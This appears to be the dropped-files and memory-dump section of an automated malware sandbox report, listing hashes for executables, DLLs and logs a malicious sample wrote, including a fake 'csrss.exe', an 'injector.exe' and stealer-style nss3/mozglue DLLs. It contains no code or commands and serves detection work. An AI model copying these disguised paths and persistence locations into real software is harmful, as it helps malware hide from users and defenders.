MD5 7aecbe510817ee9636a5bcbff0ee5fdd
SHA1 6a3f27f7789ccf1b19c948774d84c865a9ac6825
SHA256 b4ee4aa0b664fe673986399de8105c600330339971bd8583177fa38dddd13aac
SHA512 a681efb97745aed5f73d197730049ff80798d133245d8e8bcb0faf3532a9ef440d1687016c9f666c1f56479c7db003b0388e0a69bb2626f34c86046bc477edae

memory/2248-20-0x00000000018E0000-0x00000000018E1000-memory.dmp

memory/2248-23-0x00000000018E0000-0x00000000018E1000-memory.dmp

memory/4856-26-0x0000000010000000-0x000000001020A000-memory.dmp

memory/2248-25-0x00000000018E0000-0x00000000018E1000-memory.dmp

memory/4856-27-0x00000000009A0000-0x00000000009A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\F84C.exe

MD5 aa4d2da41beb1cff9d5e8976a6614c9b
SHA1 55220085d0eadc5801f11d13a42407abb18164ec
SHA256 070358003d65fc59726a1c10c5f12ace47a20891037abc050e63a746b61a86f7
SHA512 28d1884ae99281e8dd87d19b3a321741a8473c069531a5afdce52dc0dbd010e0af8cdb1b29d8af601b2eabb00be7a622aa35a385d5d711951a3ed35dea4d445f

C:\Users\Admin\AppData\Local\Temp\F84C.exe

MD5 1c93c2b85b451a03a59ca245c05132ec
SHA1 29e57d8e86d197c7c64ce59fb49720b1d80aaf07
SHA256 490dbdbe3216e59c76a1753bf19c8f6d530dfe6d20aa83015ba0e79392ec34c5
SHA512 c003a51ebc4fc95085be8a504ba9a10e5c7e67b4bffd6f1092e1ea74b5d31b0dd4e127121746679112c5edcb2a424e904d5a8fe8546f80143a5363d51f674477

memory/924-34-0x0000000003880000-0x0000000003A3C000-memory.dmp

memory/924-35-0x0000000003A40000-0x0000000003BF7000-memory.dmp

memory/3232-36-0x0000000000400000-0x0000000000848000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FACE.exe

MD5 e6dd149f484e5dd78f545b026f4a1691
SHA1 3ea5d0fb2de5bfad3dc6dc1744708ccd31102df6
SHA256 11243641663323721ba21494a394de70ae70d4ea23c23f2e2a397fcc3cfea1a7
SHA512 0defb358d59221c56731745a25250dfea49ecbb411f11f31a92ec20fa2123646f4aaf9fd4999898c39e4674f616bc1bed7ef2368b61a29d595dc7b9340dd058b

memory/3232-39-0x0000000000400000-0x0000000000848000-memory.dmp

memory/3232-44-0x0000000000400000-0x0000000000848000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\F84C.exe

MD5 6e92468a589a118a0e52a69838812d5a
SHA1 f7600765aaf24de6261aceabb2823992d5b7d11a
SHA256 89de3a6e7282355c370058f7b4fe364ec79205602c38013dc5f23196cf7a1f2a
SHA512 f212a536db73fb5a9798cbd472913ca8dfcad06c724b19930098ec3868ca41f2bb825d9824f6f0aaace763f57c589768206f6565461f79d97ae93591f96fd570

memory/2248-46-0x0000000000AD0000-0x000000000137F000-memory.dmp

memory/3232-47-0x0000000000400000-0x0000000000848000-memory.dmp

memory/4028-49-0x00000000048A0000-0x000000000490B000-memory.dmp

memory/3232-50-0x0000000000400000-0x0000000000848000-memory.dmp

memory/4028-48-0x0000000000400000-0x0000000002D8C000-memory.dmp

memory/3232-51-0x0000000000400000-0x0000000000848000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\F231.dll

MD5 e736096289f39c401f8bad036cddc001
SHA1 638ca4b629841616f5236ad883adcb0090762199
SHA256 32e27f69b28765479817e017f44c36370942cf33ea4c15658c61d7032a5cbdf0
SHA512 8a46d566078d35dbd3e162369ae1a412cddcca23aa128d493eb9ad67fa80edbdb9fc1b4c2826e3b040bf571e29e59426cb740eb1a6b90a8f51c2f93fa59ce1c8

memory/4028-55-0x0000000002DF0000-0x0000000002EF0000-memory.dmp

memory/3232-56-0x0000000000D60000-0x0000000000D66000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\723.exe

MD5 301cf70eae176450f29acd86816c0dc5
SHA1 4dc0ce8c900485ac74978186a330b0e2db46c045
SHA256 6447eb57931dd8620bb82793b26a70a7e1c6873378a17ec4cf050782f5896308
SHA512 7686814c133c0bf1a953b98e04073932031f8ca8fc5e57a8e661db01aea803ead1abd5554b39bd5643f0aa28e6561622c50c10141179de16f4310c0fb48fd593

C:\Users\Admin\AppData\Local\Temp\723.exe

MD5 a7626d4194736b5c284a09feca2711c1
SHA1 121f234a4e436a98036b99ebb5d9dbf0dc659b54
SHA256 4550b7b36c6f67222e23fc7bae32689660712e4fc0d2c11515582c89d7429c55
SHA512 a74eb41cf0a3a4f36cd86f680e6d03ee2c0c6bbce4841f3acab200e4a13990fce43a7dd17d67eb4119706f1e7b499ddadd079558069c945e713edaf13371e78d

memory/2868-61-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2248-64-0x0000000000AD0000-0x000000000137F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-DBO77.tmp\723.tmp

MD5 951ac648539bfaa0f113db5e0406de5b
SHA1 1b42de9ef8aaf1740de90871c5fc16963a842f43
SHA256 bb02f28cc67276b8d6609f80553c4976b2acbd34459af17167f8c1b001a84dfe
SHA512 795e654e82d38905841c3af120fb8288e3f81580a559d97266c739d101b335807b99c2592388b3b4af411f626e8d2f3966316152ca62b87a4361a8da78919b2d

memory/3588-77-0x0000000000540000-0x0000000000541000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-EHLNL.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

C:\Users\Admin\AppData\Local\Media Builder\mmediabuilder.exe

MD5 e713ed39b5c4f067e930465a158dcfd3
SHA1 510398056d90d6b733dd0e056aa7115cc111dce6
SHA256 40dced9e1673384b696dce58e7fd6d6590fc62001613002c72c4b6023f91dc48
SHA512 2052796f2601ee5e0316e43b5175e853032857746d9acc25b035a2b9110155b520a96632238122377074de1cdc2c8030e3cf10b824ef716a3077448e3b30b6f8

memory/400-108-0x0000000000400000-0x0000000000720000-memory.dmp

memory/400-111-0x0000000000400000-0x0000000000720000-memory.dmp

C:\Users\Admin\AppData\Local\Media Builder\mmediabuilder.exe

MD5 dcc3d7bf1945b58e383069eba844c716
SHA1 9cdcf351b845556ca7774bd337e5c6a4fc7a8545
SHA256 1dbfd3ef0ee9e44fe875ca6d60a144d5cf03dbf5d8c16083859714e9873fa923
SHA512 91e8cc2bda8d12cc8e24ad664129cbc65d54276b63e2cb3a36e876d6d23fc5f430366858ab8cb4bff4263ecab898a9be8a1d24defff5b88bc2e4b93b1fb3db0c

memory/400-107-0x0000000000400000-0x0000000000720000-memory.dmp

memory/2068-114-0x0000000000400000-0x0000000000720000-memory.dmp

C:\Users\Admin\AppData\Local\Media Builder\mmediabuilder.exe

MD5 cf8e6bca18a3374728f4464239d6ca47
SHA1 071cb85b0144aae1e90351e99e8f39705dbb70de
SHA256 6f0ed636782772442e54a381d39d9d24bef456ed84c353a53b42c49be6280075
SHA512 9ee8e5bc13ee97acf7e1c0fbe00c96740dda34bd67043bac432788d3a5a9238d18e6c4a64372b6f13cb787be29c0ea74006a8ead2cd31f9df77f7b0ed19f69c1

memory/2068-116-0x0000000000400000-0x0000000000720000-memory.dmp

memory/4856-117-0x0000000002370000-0x0000000002499000-memory.dmp

memory/4856-118-0x00000000024A0000-0x00000000025AE000-memory.dmp

memory/4856-119-0x00000000024A0000-0x00000000025AE000-memory.dmp

memory/4856-121-0x00000000024A0000-0x00000000025AE000-memory.dmp

memory/4856-122-0x00000000024A0000-0x00000000025AE000-memory.dmp

memory/3232-123-0x0000000002DB0000-0x0000000002ED9000-memory.dmp

memory/3232-125-0x0000000002EE0000-0x0000000002FEE000-memory.dmp

memory/3232-127-0x0000000002EE0000-0x0000000002FEE000-memory.dmp

memory/3232-128-0x0000000002EE0000-0x0000000002FEE000-memory.dmp

memory/3232-131-0x0000000000400000-0x0000000000848000-memory.dmp

memory/3232-132-0x00000000758F0000-0x0000000075903000-memory.dmp

memory/4028-134-0x0000000000400000-0x0000000002D8C000-memory.dmp

memory/2868-138-0x0000000000400000-0x0000000000414000-memory.dmp

memory/3588-139-0x0000000000400000-0x00000000004BC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\375C.exe

MD5 9a8ced484319575a23b23e72ef064368
SHA1 630123e785da8b196387dd67444bb2153f71c054
SHA256 2fdc3d510975484e43a2e755f922423b99eb6bcaf387490364fa3cecdb4da8cf
SHA512 0500b0cdb012d01e23fbefe2ed2b2c80644d496565ef608fe518b82f65aeb4461f9ad8f4d558b8f3913c739d8fa068e64b35a0dab0871855eb33b50696184336

C:\Users\Admin\AppData\Local\Temp\375C.exe

MD5 b5c2ec343dc281502edf2acb8cd6c48f
SHA1 6f9eaad5ce27c14f89a6cbf0ba7e7df200e1c5a1
SHA256 1fe33d26d59f5f45c4b818ad7fe23edb58959e5798c7a4403b7acb9aca1849b1
SHA512 9a1f6a2609b0def69d8cf3138731e0a92313fee71c931af0597875b2d75a00c959ece348aa8e674e4ac2e0b3e9909deee5c8b10f70d08e19eb8a87bc4e680ec2

memory/2068-143-0x0000000000400000-0x0000000000720000-memory.dmp

memory/3232-144-0x0000000000400000-0x0000000000848000-memory.dmp

memory/5104-145-0x0000000000C00000-0x00000000014B6000-memory.dmp

memory/3232-147-0x0000000000400000-0x0000000000848000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

MD5 f6bf5c21a8247203eb4280e83fba6664
SHA1 e7558d48e41f127dd779c35a7eb1613c74761249
SHA256 0774c2e1349c193926417a5f1783ed1961111ab1d30d2383fca93e6525262a6f
SHA512 60da2899d4fbc8910a69eb3daad48f96bdd769178ccba6c55e640989514943897a2f9f6a355ed97cb16bacdcceb57eaa7eedacd6901242887c045ae4593f0817

memory/5104-148-0x00000000733E0000-0x0000000073B90000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4901.exe

MD5 0ca68f13f3db569984dbcc9c0be6144a
SHA1 8c53b9026e3c34bcf20f35af15fc6545cb337936
SHA256 9cd86fa59ea2d10f9b9f3293c132f158fcb7dd993fdb706944f9fe9fa409504a
SHA512 4c3a3be5fda0f9060a08b95383b5260e4079dbcff73849d2fac88520ae625c33a73c5858b25b717fcccebf03c3ad9b19807de8bcfa7ea22be6648cc965072b7d

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

MD5 59782185bcf5b215e0db15afa0002e06
SHA1 8a4e122681e234f1b39647eb6c0cde54d177fe9e
SHA256 ff6eec4eee9143ac8234e33d2753a15f00a209cd08ac609e36ad58aa5e60304c
SHA512 36bd597ab3c08fb5ce6803ace74951bf5b208125fc15087fd0ffbb0c439b4ffa334b1f527c277eaf8169e6d4b11b4d9ec8cc0c8776ecc3c1938044dc6fe05ec9

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

MD5 76b128828f81877a5adfad5eb220a4fd
SHA1 ea048c8f4c2e8c585ddf0e8f45597186b6bbaaa4
SHA256 1ac611ae91a2b51544cd72ede52d8357b95ab618efc8a000acebf5803c2ed2b5
SHA512 6a3b7f032aa40d119415adb87aa14ca9f6fc816fc84cb8f9f8e981420d33510129d9b5651d8af9cdc00c55cf94afdfdddd2246c3b505ac9c8276e1f725aa2746

C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe

MD5 43706993cce342c8b85b1b175f941c96
SHA1 d10587600a64da3210a83da771bd7b64d5b81e1f
SHA256 bd7e266eea9db4686f795a0c2ae61684537ee997cdda24b9935e7c7af12d785c
SHA512 2180ff0458f547c3abb14e0089e7ab2f71d23ec4fe88d6a3596a76839d11dc180022520c0e61dff8b24c3e98dcf082df59279904b02ba3459b1e0298a10ea91d

C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe

MD5 7c09db9c2dacb9e2f18b225f9f204f7a
SHA1 8b2e2227f02371994fb1a5d3839568a713fa7600
SHA256 2f0d802802e13e5208a8adf47fb03f66e2ba0625396220a2f6af920bd0fc6674
SHA512 ee6eb0cc2ccc30ebcb3a7b70e2bdbbbbaf17d8745576cc1eb5d80744118ac484e42eb202ff4b8c8a59aa380e95b2d5b09d1754d26c3d72bfb0c6f8ef4f85830b

C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe

MD5 b17be9c9cd31a7c69c5dccc4222f3241
SHA1 0c4f24a70c3f555d8ebee3397a850a08f68051d1
SHA256 45c0c53b6d1c5d7694e381ae14a6cd19e44d54dddb7c4aac00fe5fba9483b9ea
SHA512 ff0884a00096e018008b5b50876ef6345959eaea8f5a0945a748070df87824ffb47566c50fc1474bf7f988801ffbc8a5c04e273483ee93615de027890efc3787

C:\Users\Admin\AppData\Local\Temp\FourthX.exe

MD5 9e3c0fbd879284ddc1a24e3ae2310922
SHA1 ec7dc55591baa85b28453ddfbebc7e5b5bffe02c
SHA256 4c3812e784e2b73faa15262bd1126be8479fb3246f5f18bd519c71e70b59594d
SHA512 1d82ec2ea8538aad5d74b31053860634825f3b62c0e8dce40d3576791cdef71967eb42792af18e8d088e85ca705365fefa8e635e2e0f6d4b1b0b2a2bab6fa21f

C:\Users\Admin\AppData\Local\Temp\FourthX.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\nsj4F64.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

MD5 70b05ac593ba4afd847436f2dbd542a3
SHA1 d8adc1ea4f762639a79f2f2ce2f3dece4a067e27
SHA256 dd24bebe073f6d912f3661a5944814beb824e7a655fecccb2245d768eda51a5a
SHA512 829eb47e34d72785857b964357edfcfd2e7121ed6292fed5f490a11bc8c3990902b960c7f8a4597c26b1a909befaf5cf3133f274540842d6e8b0d0c9e8fe03b7

memory/5104-191-0x00000000733E0000-0x0000000073B90000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FourthX.exe

MD5 2fe9860d62aeebd600e504a6b6c7a9d2
SHA1 edaa583ccc78d914c79389e69d24ce7264a813ef
SHA256 1a75104e58525eed39afac6c3de839e436f7e5212390c4b50c8d308c4d0090c7
SHA512 5429b0f28ed8745eae7d6f2c517ec6c7fc53a48c04c420fb7fb46363d1a98cb239125cf356a8167f23c55a66bd4f3b2872e6e7d10274531179d91544e7cbef57

memory/3232-194-0x0000000000400000-0x0000000000848000-memory.dmp

memory/4432-195-0x0000000000BC0000-0x0000000000BC1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nst5A33.tmp

MD5 9089c5ddf54262d275ab0ea6ceaebcba
SHA1 4796313ad8d780936e549ea509c1932deb41e02a
SHA256 96766ea71dc59a5b1734aba76c1ab1cbc8459a9ee023e9875359667dbf51ea4a
SHA512 ec71801feccd0c900132425d6bc601bcae6e78702b708df80783a752d08c8bdc49f0b0c8e7c37b15a02b381369b8a3c1114d7385796316b834738045f7dc053c

C:\Users\Admin\AppData\Local\Temp\nst5A33.tmp

MD5 0ab522cd9cc4a004d8b7b21445b58132
SHA1 62da3b22a7ef628712fc771cd10fac96bafb558f
SHA256 4e6080d8571cd53972a0dfa4f383d61ee95efef520988cf50a17bd569beb6486
SHA512 7cc4575c6746eaa92ab837c38203deed2c4beaff6aae6bd60e68edd0a197091695be68f968289db6892f3a96425c334771673daa08c3d8a51be8deb56e75dfc9

memory/4028-208-0x0000000002DF0000-0x0000000002EF0000-memory.dmp

memory/3336-209-0x00000000028A0000-0x0000000002CA7000-memory.dmp

memory/3336-210-0x0000000002DB0000-0x000000000369B000-memory.dmp

memory/3336-211-0x0000000000400000-0x0000000000D1C000-memory.dmp

C:\Users\Admin\AppData\Roaming\Temp\Task.bat

MD5 11bb3db51f701d4e42d3287f71a6a43e
SHA1 63a4ee82223be6a62d04bdfe40ef8ba91ae49a86
SHA256 6be22058abfb22b40a42fb003f86b89e204a83024c03eb82cd53e2a0a047c331
SHA512 907ad2c070cc1db89f43459a94d7f48985d939d749c9648b78572a266f0d3fde47813a129e9151dbf4a7d96d36f588172f57c88b8b947b56ed818d7d068abab2

memory/2068-214-0x0000000000400000-0x0000000000720000-memory.dmp

memory/3232-216-0x0000000000400000-0x0000000000848000-memory.dmp

memory/3588-215-0x0000000000540000-0x0000000000541000-memory.dmp

memory/2020-217-0x0000000002510000-0x0000000002610000-memory.dmp

memory/2020-218-0x00000000023F0000-0x00000000023FB000-memory.dmp

memory/2020-220-0x0000000000400000-0x00000000022D1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\70AE.exe

MD5 b10895f77c325310116cfc47095d9252
SHA1 4c1ae27fef692ec05ff826aa7eaab519ae5a8e06
SHA256 851657de20aed9fdce10b608dce83523d137771c2e1e9582f8d9eecff5a14453
SHA512 d21cca7801fcf891e88b39378a7f06179577b218f5660f4cc049b16f03f7bf8f910370734af7b005cf17bc5769fb6aef868e6659a1a648cf374c70d4aa9a7910

C:\Users\Admin\AppData\Local\Temp\70AE.exe

MD5 3b8ff5ba60fc77e4bce540bd0f9c09fd
SHA1 d9b48cf74f8261a3c98d712a485a09547e01d4de
SHA256 e08ba45aa1191f8c5e85a1d0d8ae916326d435f6b9859bc6d23c0672daee0c96
SHA512 c491be1946726fe31017080388095e28f141b86f56cf6276882105de491376612f7a928fc59de8661741413e4276ffd827e4142cf7945466ed40da10a6cbf68a

memory/3336-226-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/4816-227-0x0000000001790000-0x0000000001791000-memory.dmp

memory/4432-228-0x0000000000400000-0x00000000008E2000-memory.dmp

memory/4816-229-0x00000000017A0000-0x00000000017A1000-memory.dmp

memory/4816-230-0x00000000017B0000-0x00000000017B1000-memory.dmp

memory/4816-233-0x0000000001800000-0x0000000001801000-memory.dmp

memory/4816-232-0x00000000017F0000-0x00000000017F1000-memory.dmp

memory/4816-234-0x0000000001810000-0x0000000001811000-memory.dmp

memory/4816-231-0x0000000000860000-0x000000000130D000-memory.dmp

memory/4816-236-0x0000000001820000-0x0000000001821000-memory.dmp

memory/2068-239-0x0000000000400000-0x0000000000720000-memory.dmp

memory/4816-240-0x00000000033A0000-0x00000000033D2000-memory.dmp

memory/4816-242-0x00000000033A0000-0x00000000033D2000-memory.dmp

memory/4816-243-0x00000000033A0000-0x00000000033D2000-memory.dmp

memory/4816-241-0x00000000033A0000-0x00000000033D2000-memory.dmp

memory/2084-246-0x00000000024C0000-0x00000000025C0000-memory.dmp

memory/2084-247-0x0000000002440000-0x0000000002467000-memory.dmp

memory/2084-248-0x0000000000400000-0x00000000022D9000-memory.dmp

memory/3512-250-0x00000000030A0000-0x00000000030B6000-memory.dmp

memory/4816-254-0x0000000000860000-0x000000000130D000-memory.dmp

memory/2020-255-0x0000000000400000-0x00000000022D1000-memory.dmp

memory/4972-265-0x0000000002920000-0x0000000002956000-memory.dmp

memory/4972-269-0x00000000052B0000-0x00000000058D8000-memory.dmp

memory/4972-271-0x0000000072E50000-0x0000000073600000-memory.dmp

memory/4972-282-0x0000000004C70000-0x0000000004C80000-memory.dmp

memory/4972-286-0x0000000004C70000-0x0000000004C80000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iywfhfbd.z3b.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4432-294-0x0000000000BC0000-0x0000000000BC1000-memory.dmp

memory/4972-287-0x0000000005160000-0x0000000005182000-memory.dmp

memory/4972-296-0x0000000005950000-0x00000000059B6000-memory.dmp

memory/4972-300-0x0000000005AA0000-0x0000000005B06000-memory.dmp

memory/4972-303-0x0000000005B10000-0x0000000005E64000-memory.dmp

memory/4972-325-0x0000000004CA0000-0x0000000004CBE000-memory.dmp

memory/4972-326-0x0000000005F60000-0x0000000005FAC000-memory.dmp

memory/4972-333-0x0000000006440000-0x0000000006484000-memory.dmp

memory/3336-341-0x00000000028A0000-0x0000000002CA7000-memory.dmp

memory/4972-342-0x0000000004C70000-0x0000000004C80000-memory.dmp

C:\ProgramData\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

C:\Users\Admin\AppData\Local\Temp\4KPV6A~1\cached-microdesc-consensus.tmp

MD5 adb29a2b3d4aae105be1eca35da10afc
SHA1 8496caa674d5bd59c37340e949871e6a33a6a6a9
SHA256 9bc8d90c27922ab30615548b2e41d62f15ab2749290713bb3714b53ae21ab4b7
SHA512 7dba52ac5bdbaa9dafd8a98503e60636ab8db09ae99faa725b768c739147ca5dd42a6b78c3879b70af9ce7093ac8f1e23d706df7f53e2d64f66de5d13e958df9

C:\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

C:\ProgramData\Are.docx

MD5 a33e5b189842c5867f46566bdbf7a095
SHA1 e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA256 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512 f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

MD5 c7fe878e6fc3be20c84b5e85b97efe17
SHA1 51ebfabdef927465e68c5843ae4f2a930b82a24b
SHA256 a4a662c0c92c27d74fc00f6f5e24b1b4116da7d582607161f0570cdfcc0a6040
SHA512 24f2fd40425ce1a1585157255b0dbb856635fa2fb08f00419693ebf8e0c774d47890aad7b69adee08b315607b0bc68375421737f4785b577110894028a013289

C:\Users\Admin\AppData\Local\Temp\4KPV6A~1\cached-microdescs.new

MD5 c872c92977f6a8428d1f1bc05244f4a3
SHA1 aa1a48a997997717b66b4cc4621ff14d65d14afe
SHA256 fae2fe308dee13de2c7a2be3dfac523a3ea62701a68eeea7fa34db79f02da1ea
SHA512 0d860841f0fd145c628e7d9f36c59b555f6bfdd4f8768769b74d3c6f67a0d87dcc08c442a3d3891c9831c2f08d40e98413e54c3362a9d842c0776b67e0009963

C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe

MD5 b03886cb64c04b828b6ec1b2487df4a4
SHA1 a7b9a99950429611931664950932f0e5525294a4
SHA256 5dfaa8987f5d0476b835140d8a24fb1d9402e390bbe92b8565da09581bd895fc
SHA512 21d1a5a4a218411c2ec29c9ca34ce321f6514e7ca3891eded8c3274aeb230051661a86eda373b9a006554e067de89d816aa1fa864acf0934bbb16a6034930659

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 c0c8ca691935cdf1a3e382fbdb197cc2
SHA1 cf359727fa7d7e043d4d5edd2a7701ac16e270e1
SHA256 0d6cedfae688b28f3ec53550d549465be5cf6b9e32d56e7004917d55a0f7615d
SHA512 60814fe27a14fab13468b923bfd087c3fc7a89169f33a37f005aed977cf12540c7c51f0751e87be3f63af478d3581e3c9cb9a7c2d108e5be9b2b02a88d980530

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 7363ded56cc8c4fdc26e986428b3ff57
SHA1 2bc1cc5db0bc6bfbe19442c4c91acc2ef911e1df
SHA256 ca8b78e8498dc6ae407a438e68c64d62b4f88d9b1765a20100b6738fe47a93d6
SHA512 e8b98a74b07846091e9e3a6bf58673733b6c4c0567f37b10df5590ac919fd216fc16af757d2d61cda33b27314f712a7beee19437c577e494d24c812c00e882e8

C:\Windows\rss\csrss.exe

MD5 d122f827c4fc73f9a06d7f6f2d08cd95
SHA1 cd1d1dc2c79c0ee394b72efc264cfd54d96e1ee5
SHA256 b7a6dcfdd64173ecbcef562fd74aee07f3639fa863bd5740c7e72ddc0592b4fc
SHA512 8755979d7383d6cb5e7d63798c9ca8b9c0faeec1fe81907fc75bbbb7be6754ab7b5a09a98492a27f90e3f26951b6891c43d8acd21414fb603cd86a4e10dac986

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 a1a6e00ad86306a7e3cf5dfbdc85d668
SHA1 648262ea8c7f0e0776f4148f52c2e08e5be62702
SHA256 906e75e19d56b8ad5e81772fb789ffb2d39dee2cea68870bb2fc60e061d2ac0c
SHA512 c6b77c9499fdefdd132e8b25e4fdefed55a3b5509fa6f7b819a01eafb568b2da26cc5f1b654946be0b5507436dacae3e4e1fc0ed65c8721458a398d60a1b3622

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 9a1fb9e61d5edea2f4624ac4dbc7fdb1
SHA1 881abd49ef4742faf67bc0ebda2114afe8754975
SHA256 b402713d34ead6b4cf6fc538478138de5432c79cabbda2fd60fb1d476755e046
SHA512 721ed59f6b2210bb2e1e9d4dc2b3019761442e36d70ef1be4a5eefabe568274c29180f9db8d03255b2b6a67122989b84058ac92f7b6e71077dd6308f643bb8b0

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 64fed1db05d52eac09cd954ce44867b9
SHA1 65f2e6e551d50e512160945d13df310f0e692952
SHA256 8ffb678a94cad10d604ed312fc31a02fae298e900c0a629f7e58b1ee4d56d33d
SHA512 1a0c0bab11e93f7dbf0a66c9ead6b55b2304caba0407d7d8f9fcee227405c0f3e87efcda155033a117967cbab475ab7bdfebfa7565db1db3be88ad44ce9bd9c5

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 a0ab2251d3ceb1349776ff3642e807bb
SHA1 3a3c78a26b87b9cfc0b9605e94e03eccb288426d
SHA256 5b1fffd5f6d7e45458ced266a096de2d1b9af84f71c0bc97b0d2b64a317ae391
SHA512 bb11a89847dc5e9c874453df71dfc8089bbe46c2f7b5079543eb0a686fd4c3dcf468a0aba4f156d6fe193d15552a55b9d1cba58fa82cb59e863c4cda82159ea2